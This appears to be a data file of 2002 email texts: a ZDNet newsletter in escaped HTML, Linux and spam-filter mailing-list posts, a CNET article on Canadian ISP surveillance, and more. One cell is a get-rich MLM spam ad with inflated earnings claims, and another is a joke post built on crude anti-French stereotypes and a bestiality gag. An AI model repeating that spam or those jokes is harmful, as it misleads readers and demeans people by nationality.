   &lt;img src="http://i.i.com.com/cnwk.1d/i/ne/pt/2002/07/070902ToshibaSatellite1955.jpg" width="150" height="150" border="0" align="right"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;P&gt;
   &lt;font size="+1"&gt;
   &lt;b&gt;Toshiba releases monster notebook&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Weighing in at 9.6 pounds, the new &lt;b&gt;Toshiba Satellite 1955-S801&lt;/b&gt; notebook 
 has a 2.2GHz Pentium 4 desktop processor and a huge 16-inch display. The 
 &lt;b&gt;desktop-replacement notebook&lt;/b&gt; category also includes the Satellite 1905 
 that Toshiba introduced last month, as well as products from Hewlett-Packard. 
 Gateway and Dell may be looking at the concept too.  The Satellite 1955 will 
 cost $2,499 and sports a few features not found in other desktop-replacement 
 notebooks, including a detachable wireless keyboard and wireless mouse. 
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq_no55djbjsMVKpv3DxnR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!--STORY 4--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="left"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/tu_lschlesinger.gif" width="85" height="110" border="0" align="left"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Clone, clone, clone your disks&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Imaging software can help you roll out new systems faster, right? The catch is that fine print requirement for "identical client hardware." But Tech Update's &lt;b&gt;Lee Schlesinger&lt;/b&gt; says new technology from IBM may be a quantum leap for disk imaging. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkHvFV__HKqBxDVAmoBameR" &gt;
 &lt;b&gt;Read his full commentary&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- STORY 3 --&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="123" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://www.zdnet.com/enterprise/graphics/070902_tan_quote.jpg" width="220" height="193" border="0" align="left"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Tech gets set for China breakthrough&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 It's one of the few words that can perk up a high-technology executive these 
 days: China. Companies have attempted to tap the country's &lt;b&gt;enormous potential&lt;/b&gt; 
 for years, but it has become a far more attractive target recently as 
 the rest of the world remains mired in &lt;b&gt;economic problems&lt;/b&gt;. Now, the People's 
 Republic of China has become one of the leading strategic opportunities for 
 Intel, Nokia, Hewlett-Packard and virtually every other multinational. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXFQWZpsA98BbBL7kOi_yR" &gt;
 &lt;b&gt;Read part one of this special report&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Poll: What will be the primary role of TabletPC?&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Tech Update readers see &lt;b&gt;no shortage of applications&lt;/b&gt; for Microsoft's TabletPC. 
 Some of you want one, many of you say you need one. But what will be the primary role 
 of TabletPC: Vertical applications? A notebook/desktop replacement? Home use? 
 Or will it meet the same fate as previous tablet attempts?
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXH6w8t6-Id5q0_HZB17WnR" &gt;
 &lt;b&gt;Take our Quick Poll&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- Write to me --&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;Write me at &lt;a href="mailto:dan.farber@cnet.com"&gt;&lt;b&gt;dan.farber@cnet.com&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=2f-hYaFIqnzAablrW5P26D_8gaZjMeR"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href="http://clickthru.online.com/Click?q=44-9nxfIZUtYM2hxvgEMLKlXBDgnVsR" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;Q&amp;A&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=59-y53oIEnthMnewNYlpW-B_KMqztFR" &gt;
 &lt;b&gt;Caldera VP bullish on UnitedLinux&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 In part two of a Tech Update interview, &lt;b&gt;Benoy Tamang&lt;/b&gt;, Caldera VP of 
 strategic development, discusses UnitedLinux's strategy regarding additional 
 members and competition in the enterprise Linux space. 
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;FEATURE&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES2bZWfG9QA5K-fxuEL59R" &gt;
 &lt;b&gt;Putting Web services to work&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Want to get your feet wet integrating Web services? Find out how to &lt;b&gt;integrate Web services&lt;/b&gt; on a small scale and how particular platforms can simplify your efforts.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download --&gt;
         &lt;!-- /coming tomorrow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href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lF1Q8zhtuoAABMMPZ9rR" &gt;
 &lt;b&gt;Should all storage be encrypted?&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Start-up &lt;b&gt;NeoScale&lt;/b&gt; claims that its new storage encryption appliance 
 can secure any or all data bound for &lt;b&gt;Fibre Channel&lt;/b&gt;-based storage--with no impact on performance.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size="-2"&gt;&lt;b&gt;Networking&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTjO9jvHW2H3f2jvrqULlR" &gt;&lt;img src="http://www.zdnet.com/products/graphics/052302gateway.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=ae-jOE6QMB1LJF21058-mhe2RYEVu4R" style="text-decoration:none"&gt;&lt;b&gt;Find the right home network&lt;/b&gt;&lt;/a&gt; &lt;br /&gt;Choosing the right technology to match your networking needs is vital. Here's help in making the choice.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=d4-E0SqQ0ExfrG7J60_4Mc3148lk6yR" style="text-decoration:none"&gt;Read reviews&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Networking&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVzOdjZE1WTRnU3P83P5XlR" style="text-decoration:none"&gt;Linksys EtherFast wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgwytdTpFmeE4rbg6amtI4R" style="text-decoration:none"&gt;Linksys EtherFast router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XWrJ4X3FCssDLfzpHOCerR" style="text-decoration:none"&gt;Siemens SpeedStream router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=28-A2wXIRd4OB7zlFPEL2t1VlTK8yiR" style="text-decoration:none"&gt;Wireless 802.11B Router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=3d-oi9NIbz4ihaB4YFvwlGWUTnaNtPR" style="text-decoration:none"&gt;NetGear HE102 802.11a wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=52-LUXoIrJtzsjzZwRMWz8AtIQwjjnR" &gt;More popular networking products&lt;/a&gt;&lt;/b&gt;&lt;br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href="http://clickthru.online.com/Click?q=67-PnDkIOEDC4CusARWhKPAKa1CPIuR" &gt;Veritas CEO Gary Bloom speaks out at Tech Update.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPd2Bh-I9Uywq2NRJSBTZR" &gt;Check out these personal laser printer picks at ZDNet Reviews.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzTt5H4xCOzeFOPq1FsnynR" &gt;See how WAP works and how you should use it at Builder.com.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BwDbwN5pOLF5vLk7KCgFeR" &gt;Need a new job? Find one today in ZDNet's Career Center.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6Bdh4H6VcMmobF8XEDxwcyR" &gt;CIOs talk out about the future of IT at CNET News.com.&lt;/A&gt;&lt;/b&gt;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href='http://clickthru.online.com/Click?q=d2-THG_rXLB_KpNFPfSGPD_5DYVkreb99RR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXfB7UCDVVqS8CMB0qvseR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwF4ccn4xra9-0t3VVat9yR"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href="http://clickthru.online.com/Click?q=11-l8riI2-4W1dypxEX3VynhNBuCqlR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2assUdFiSkMRUVolYrBeR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIslKh0-jpY0VXXjhrHNHyR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPu7tvxDGJlh9GpMUHM3FR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWIFsagSIgsPj9y-DzbW-9R" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZIOsmhmhLbDr4q1O7VpJcR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IdCXqmilpVb8HYULuonXiR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTGWUyrDxsIC1b2OB8OEPR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZBRt--Tc6RaT-Dc13yE_rR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=d0-vjOh-_W18jk9n8qNXzSH-KgyDsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">So, given the apparent commonality of these occurances, companies appear 
 to be losing a large amount of money by mailing these tiny checks out. 
 Why can't they simply credit the account in question on the next bill? 
 Granted, if an account has been closed there is no such option...
 Elias
 Christopher Haun wrote:
 &gt; eheh i'll do yah one better i have a check some place (i just moved or i'd 
 &gt; go scan it in) for $0.01 from Time Warner Cable. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Still believe you can earn $100,000 FAST IN MLM? GET REAL!
 GET EMM, A brand new SYSTEM that replaces MLM with something that WORKS! 
 Start Earning 1,000's Now! Up to $10,000 per week doing simple online tasks.
 Free Info-  synergy@luxmail.com - Type "Send EMM Info" in the subject box.
 This message is sent in compliance of the proposed bill SECTION 301. per section 301, Paragraph (a)(2)(C) of S.1618. Further transmission to you by the sender of this e-mail may be stopped at no cost to you by sending a reply to : "email address" with the word Remove in the subject line.  
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multipart message in MIME format
 -----=_Next_Part_10878775_zmiO_mWTr_109818780
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: 8bit
 Content-Disposition: inline
 If anyone here is running (null) beta then you may like these Gnome theme packages.
 They are enhanced and repackages from my previous theme packs, this time to conform
 to the way pre-release RH8 handles themes for GTK1 and GTK2.
 RedHat has a preferences -&gt; themes app, but themes only show up there that have BOTH
 gtk1.2 (Gnome1) themes AND gtk1.4 (GTK2 aka Gnome2) themes available. Then RH will
 apply the theme to both GTK versions, so the user does not really notice that
 different GTK toolkit versions are being used, since they *should* look the same.
 This "gtk2-engines-compat" RPM has GTK2 ported themes for those themes that are
 included in the RH package "gtk-engines" themes pack for GTK1.
 The "gtk1+2-themez" pack mostly repackages my previous theme RPMs in a way that the
 (null) btea like, and supposedly the next RH8 when released :)
 forward - original mail:
   From " Angles  Puglisi" &lt;angles@aminvestments.com&gt;
   Date 09/01/2002 - 06:10:03 am
   Subject some (null) eyecandy packages
 -----=_Next_Part_10878775_zmiO_mWTr_109818780
 Content-Type: message/rfc822;
 Content-Disposition: inline
 Delivered-To: limbo-list@listman.example.com
 X-Originating-IP: [207.172.11.147]
 From: "" Angles " Puglisi" &lt;angles@aminvestments.com&gt;
 To: limbo-list@example.com
 Subject: some (null) eyecandy packages
 Message-ID: &lt;20020901.eak.70699000@www.dudex.net&gt;
 MIME-Version: 1.0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 8bit
 Content-Disposition: inline
 X-Mailer: AngleMail for phpGroupWare (http://www.phpgroupware.org) v 0.9.14.000
 X-Loop: limbo-list@example.com
 Sender: limbo-list-admin@example.com
 Errors-To: limbo-list-admin@example.com
 X-BeenThere: limbo-list@example.com
 X-Mailman-Version: 2.0.1
 Precedence: bulk
 Reply-To: limbo-list@example.com
 List-Help: &lt;mailto:limbo-list-request@example.com?subject=help&gt;
 List-Post: &lt;mailto:limbo-list@example.com&gt;
 List-Subscribe: &lt;https://listman.example.com/mailman/listinfo/limbo-list&gt;,
 	&lt;mailto:limbo-list-request@redhat.com?subject=subscribe&gt;
 List-Id: Discussion of the Red Hat Linux 'Limbo' beta &lt;limbo-list.example.com&gt;
 List-Unsubscribe: &lt;https://listman.example.com/mailman/listinfo/limbo-list&gt;,
 	&lt;mailto:limbo-list-request@redhat.com?subject=unsubscribe&gt;
 List-Archive: &lt;https://listman.example.com/pipermail/limbo-list/&gt;
 Date: Sun, 01 Sep 2002 10:01:54 +0000
 I make these for myself, you may find them of interest. See the .spec file(s) for info.
 http://www.dudex.net/rpms/gtk2-engines-compat-1.0-aap1.noarch.rpm
 http://www.dudex.net/rpms/gtk2-engines-compat-1.0.spec
 http://www.dudex.net/rpms/gtk1+2-themez-1.1-aap1.noarch.rpm
 http://www.dudex.net/rpms/gtk1+2-themez-1.1.spec
 You'll need gtk-engines, gtk2-engines, and a "thinice" engine for gtk2, this one
 might be a old now but it works:
 http://www.dudex.net/rpms/gtk2-thinice-engine-2.0.1-2.i386.rpm
 http://www.dudex.net/rpms/gtk2-thinice-engine-2.0.1-2.src.rpm
 http://www.dudex.net/rpms/gtk2-thinice-engine-2.0.1.spec
 --
 That's "angle" as in geometry.
 _______________________________________________
 Limbo-list mailing list
 Limbo-list@redhat.com
 -----=_Next_Part_10878775_zmiO_mWTr_109818780--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Yeah, that's exactly what I was doing--I didn't realize I was
 &gt; incurring administrative pickle bloat this way.  I'm specifically
 &gt; trying to make things faster and smaller, so I'm storing individual
 &gt; WordInfo pickles into an anydbm dict (keyed by token).  The result
 &gt; is that it's almost 50 times faster to score messages one per run
 &gt; our of procmail (.408s vs 18.851s).
 This is very worthwhile.
 &gt; However, it *does* say all over the place that the goal of this
 &gt; project isn't to make the fastest or the smallest implementation, so
 &gt; I guess I'll hold off doing any further performance tuning until the
 &gt; goal starts to point more in that direction.  .4 seconds is probably
 &gt; fast enough for people to use it in their procmailrc, which is what
 &gt; I was after.
 Maybe.  I batch messages using fetchmail (don't ask why), and adding
 .4 seconds per message for a batch of 50 (not untypical) feels like a
 real wait to me...
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 24 Jul 2002, Robert Harley wrote:
 --]Working too hard...
 --]
 --]Someone tell me a joke, or email me a beer or something...
 You asked for it....
 Ladies and Gentlebeans....its time now for Shlepy Shlepman and Frenchy
 along with there  all groan reviews.....
 Shlepy&gt; Heya heya heya ..I just flew in from defcon and boy are my ports
 tierd.....waka waka
 Frenchie&gt;Des Amricains, je vous dteste et tous que vous reprsentez. Vous
 tes des porcs.
 Shlepy&gt;Say Frenchie, how do you castrate a frenchmen???
 Frenchie&gt;Est-elle cette une autre mauvaise plaisanterie? Je ne sais pas,
 satisfaire vous rends ce drole singe global d'ane.
 Shlepy&gt;You kick his sister in the jaw.
 Frenchie&gt;Je suis dans l'enfer.
 Shelpy&gt;Dont he speak funny folks? yep them French are mighty bizzare.
 They do things very differently over there. For instace you know why
 they dont have fireworks at Euro Disney?
 Frenchie&gt; Puisque nous soufflerions plutt nos ttes outre de qu'observe un
 infrieur brut classer la clbration amricaine?
 Shlepy&gt;What ever ya said, nope..Because every time they shoot
 them off, the French try to surrender.
 Frenchie&gt;Etant donn le choix entre les Allemands et vous que je
 nettoierais heureusement versez les stalles dans les camps alors doivent
 aller  vos parcs d'amusement.
 Shlepy&gt; Aint he the continental one....Speaking of global
 politics....Three guys, an Englishman, a Frenchman and an American are out
 walking along the beach together one day. They come across a lantern and a
 genie pops out of it.  "I will give you each one wish, " says the genie.
 The American says, "I am a farmer, my dad was a farmer, and my son will
 also farm. I want the land to be forever fertile in America." With a blink
 of the genie's eye, 'FOOM'  -  the land in America was forever made
 fertile for farming.  The Frenchman was amazed, so he said, "I want a wall
 around France, so that no one can come into our precious country."  Again,
 with a blink of the Genie's eye, 'POOF'  -  there was a huge wall around
 France.  The Englishman asks, "I'm very curious. Please tell me more about
 this wall.  The Genie explains, "Well, it's about 150 feet high, 50 feet
 thick and nothing can get in or out."  The Englishman says, "Fill it up
 with water."
 Fenchie&gt;Plutt nous devrions nous noyer que mangent la cuisine anglaise.
 Shlpey&gt; Them French, you dont know what they are on about but damn it sure
 sounds romantic. And you knwo they are great lovers those french are. A
 psychology professor decided to study the way in which different people
 from different parts of Europe have sex with sheep. He traveled first to
 Wales, where he asks a farmer to explain his method: "Well, boyo, I put
 her back legs down my nice green wellies, grab her with me velcro gloves,
 and we're well away. Tidy!"  The professor tries Scotland next "Hoots an'
 toots man, I put her back legs down my nice green wellies, grab her with
 me velcro gloves, and we're  well away. Och aye tha noo!"  The professor
 moves on to Germany: "Well, I find the most efficient way is to grab her
 with my velcro gloves, and we're well away. The professor is noticing a
 pattern developing, so he decides to try France, and then end his
 investigation.  He stops a bloke by the Eiffel tower named Pierre, and
 asks him to explain the French method: "Well monsieur, I put her back legs
 down my nice green wellies, sling her front legs over me shoulders, and
 that's all there is to it!" The professor is excited to have found some
 national variation and tells Pierre that this is different to the methods
 of the Scots, Welsh and Germans. "How do they do it then?" asks Pierre,
 and the professor explains. Pierre on hearing the explanation walks of
 disgusted. "What! No kissing?"
 Frenchie&gt;Voil. J'ai stopp.
 Shlepy&gt; Hey, where you going with the sheep, we need them for the next
 act....
 A little traveling music maestro.
 -tomwsmf
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Sun Solaris..
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney wrote:
 &gt; On Thu, Aug 22, 2002 at 05:13:01PM +0100, Fergal Moran mentioned:
 &gt; 
 &gt;&gt;In a nutshell - Solaris is Suns own flavour of UNIX.
 &gt; 
 &gt; 
 &gt;  Though I'm sure that this nice person would like a bit more detail.
 &gt; 
 &gt;  Solaris is quite different to Linux, though these days you can make
 &gt; solaris act a lot like linux with an extra CD of GNU tools Sun ship with
 &gt; solaris. It is based on the SysV unix family, so it's quite similar to
 &gt; other unixen like HPUX and SCO.
 &gt; 
 &gt;  Sun's hardware in general is more reliable, and a lot more expensive. One
 &gt; of the main bonuses you get by buying Sun is that you are getting your
 &gt; hardware and software from one company, so if you have a support contract,
 &gt; they have to fix it. They can't fob you off with 'that's a software
 &gt; problem, talk to the software vendor.' etc.
 &gt; 
 &gt;  If you are set on Linux, you most likely can do your own support. There
 &gt; is then a world of different hardware options. You can run Linux on Sparc,
 &gt; though some companies like RedHat don't maintain a sparc port anymore.
 &gt; 
 &gt;  You can also buy your machine from linux-oriented companies like DNUK,
 &gt; who do machines designed to run linux, and their own version of linux,
 &gt; that has a few extras for their machines. Or, you can get a machine from a
 &gt; cheaper company like Dell, and it'll most likely work, most of the time.
 Why do you say Dell is cheaper than DNUK?
 It gets a bit complicated though!
 http://www.levenez.com/unix/history.html
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; If the creator didnt say you could have it without paying, it's theft, so
 &gt; simple, hell that's even in all the major holy books.
 Wow, I've got a great idea!  I'll hire a skywriter to write "you can't
 look at this without paying," then lock up everybody who looked at it and
 didn't pay!  It can't fail -- Jesus is on my side!
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">No, please post a link!
 Fox
 ----- Original Message -----
 From: "Arnaud Abelard" &lt;arnaud.abelard@sciences.univ-nantes.fr&gt;
 To: &lt;razor-users@example.sourceforge.net&gt;
 Sent: Tuesday, September 03, 2002 2:39 AM
 Subject: [Razor-users] razor plugins for mozilla?
 &gt; Hello,
 &gt;
 &gt; did any of you hear about a a razor plugin for mozilla?
 &gt; a plugin that would add a "report as spam" button somewhere for the user
 &gt; to report a mail as spam on a server?
 &gt;
 &gt; Arnaud
 &gt; --
 &gt; Arnaud Ablard
 &gt; Administrateur rseaux et systmes
 &gt; Irin / Facult de Sciences
 &gt; Universit de Nantes
 &gt;
 &gt;
 &gt;
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by: OSDN - Tired of that same old
 &gt; cell phone?  Get a new here for FREE!
 &gt; https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users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</si>
  <si>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Canadians again - something a little more substantive
</t>
  </si>
  <si>
    <t xml:space="preserve">Politicians worldwide are discovering the internet - what a great tool 
 for fascism, once you got the laws in place to solve that whole 
 'anonymity' thing. Also I notice this story shows the truth - the 
 Canadian government is really located in Washington, DC, Ottawa is just 
 a branch office. Come to think of it, the last story I posted about 
 Canada featured the head of its military, 'speaking to us from military 
 HQ  in Palm Beach, Florida.'
 Owen
 ----------------------------------------------------------------------------------------------------------------------------
 .
 *Will Canada's ISPs become spies?*
 By Declan McCullagh &lt;mailto:declan.mccullagh@cnet.com&gt;
 Staff Writer, CNET News.com
 August 27, 2002, 12:56 PM PT
 http://news.com.com/2100-1023-955595.html 
 &lt;http://news.com.com/2100-1023-955595.html?tag=prntfr&gt;
 *WASHINGTON--The Canadian government is considering a proposal that 
 would force Internet providers to rewire their networks for easy 
 surveillance by police and spy agencies.*
 A discussion draft &lt;http://www.canada.justice.gc.ca/en/cons/la_al/&gt; 
 released Sunday also contemplates creating a national database of every 
 Canadian with an Internet account, a plan that could sharply curtail the 
 right to be anonymous online.
 The Canadian government, including the Department of Justice 
 &lt;http://canada.justice.gc.ca/&gt; and Industry Canada 
 &lt;http://www.ic.gc.ca/&gt;, wrote the 21-page blueprint as a near-final step 
 in a process that seeks to give law enforcement agents more authority to 
 conduct electronic surveillance. A proposed law based on the discussion 
 draft is expected to be introduced in Parliament late this year or in 
 early 2003.
 Arguing that more and more communications take place in electronic form, 
 Canadian officials say such laws are necessary to fight terrorism and 
 combat even run-of-the-mill crimes. They also claim that by enacting 
 these proposals, Canada will be following its obligations under the 
 Council of Europe's cybercrime treaty 
 &lt;http://news.com.com/2100-1001-268894.html&gt;, which the country is in the 
 process of considering.
 If the discussion draft were to become law, it would outlaw the 
